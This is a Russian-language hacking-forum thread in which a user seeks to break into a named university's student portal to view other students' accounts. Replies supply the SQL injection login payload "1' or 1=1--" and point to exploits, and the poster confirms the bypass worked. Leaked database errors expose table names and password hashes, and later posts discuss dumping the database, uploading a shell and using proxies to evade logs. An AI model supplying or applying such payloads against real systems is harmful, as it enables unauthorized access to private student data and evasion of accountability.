![]() |
обойти авторизацию
Здраввуйте.
Мне зотелось бы обойти авторизазию, если возможно. http://ciu.nstu.ru/student_study/ сканером XSpider 7.7 просканировал порты и на уязвимости. выдало немало уязвимостей, подскажите можно ли из этого что-то получить и насколько сложно реализовать? сведение о сервере Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
|
На неавторизированный доступ попробуй искать эксплоиты.
|
Цитата:
|
Цитата:
http://milw0rm.com/exploits/2237 не понял как запустить на сервере, получается мне его залить надо туда, а доступа-то нет=) |
Raz0rnsk
Послушай совета, сотри сейчас XSpider с компа, и не ставь его больше НИКОГДА! Это инструмент для аудита безопасности, а не для взлома. Если ты не понимаешь его отчёты, то он тебе нахер не нужен, кроме того, что ты засираешь логи сервака ничего ты с его помошью не сделаешь. По "уязвимостям" Ну прочитай ты что он пишет: 1 ...позволить локальным пользователям использовать... 2 ...обойти ограничения safe_mode и open_basedir... 3 ...обойти ограничения safe_mode... 4 ...проводить неавторизованные операции над некорректными каталогами... Ты что, локальный пользователь? Давайте в этой теме подискутируем, зачем вы юзаете XSpider (и аналоги), я просто таких тем с отчётами удалил уже хрен знает сколько, мне просто интересно, это модно, или что? |
jokester, а ты его не юзаешь что ли?(
|
Цитата:
Щас вот мне расскажут зачем его юзать, я покажу тему родителям, и они мне купят лицензию на день рождения |
Цитата:
что предложите?:) |
Предложу заюзать скуль в авторизации :)
' or 1=1-- Цитата:
|
Цитата:
|
Цитата:
а свой лог/пасс у меня есть, мне надо чужие просмотреть :) |
Ну вообще-то я не шутил, там скуль в авторизации войти можно вставив в поле логин значение
1' or 1=1-- а поле пароль любое. А статьи я рекомендовал почитать, если непонятно, что именно я тебе посоветовал. И если ты всё-же последуешь моему совету и сделаешь это, то возможно поймёшь как можно зайти под ЛЮБЫМ пользователем. FireFenix Вы тут что, издеваетесь что-ли все? Я для кого это писал вообще? |
Цитата:
Запрос у нас будет выглядеть примерно следующим образом: Код:
SELECT t.*, st.family_name || ' ' || st.name || ' ' || st.patronymic_name FIO, st.sex FROM okuser.NODEUSERS t join decanatuser.student st on st.pk=t.idstudent WHERE t.SLOGIN='1' or 1=1--' and t.SPASSWORD='D6581D542C7EAF801284F084478B5FCC' and t.idstudent is not NULL [nativecode=ORA-00936: missing expression] |
Насчёт or 1=1, попадались пару сайтов сделаных в 2008 - 2009 годах,в админке проканал данный способ, залил шелл))
Мораль такова: надо пробывать все возможные способы, ну для начало почитать статьи которых на ачате полно, а потом задавать вопросы) |
Джокстер просто неумеет хакерствовать с хспайдером вот и завидует
|
Цитата:
получилось :) но я вообще хотел, зная вид(по своим данным), заходить под конкретным пользователем, может базу как-то слить?:) а раз проканывает заходить под 1' or 1=1--, шелл получится залить? |
Цитата:
получил К сожалению, в настоящий момент продолжение работы невозможно. Примите извинения за доставленные неудобства. ошибка при попытке авторизации студента ошибка БД: SELECT t.*, st.family_name || ' ' || st.name || ' ' || st.patronymic_name FIO, st.sex FROM okuser.NODEUSERS t join decanatuser.student st on st.pk=t.idstudent WHERE t.SLOGIN='SELECT t.*, st.family_name || ' ' || st.name || ' ' || st.patronymic_name FIO, st.sex FROM okuser.NODEUSERS t join decanatuser.student st on st.pk=t.idstudent WHERE t.SLOGIN='1' or 1=1--' and t.SPASSWORD='D6581D542C7EAF801284F084478B5FCC' and t.idstudent is not NULL [nativecode=ORA-00936' and t.SPASSWORD='9862C0CBF9702F2883680ACFFE8768DD' and t.idstudent is not NULL [nativecode=ORA-01756: quoted string not properly terminated] файл: /www/web/sites/student_study/index.php:55 |
еммм ты хотяб предохраняешься?)
юзай http://hidemyass.com/ или proxya.ru а то логи-то сохраняются))смотри свои данные не пиши) |
ТС, https://forum.antichat.ru/thread40576.html
пока 4 раза не перечитаешь эту статью, больше сюда не пиши |
| Время: 06:51 |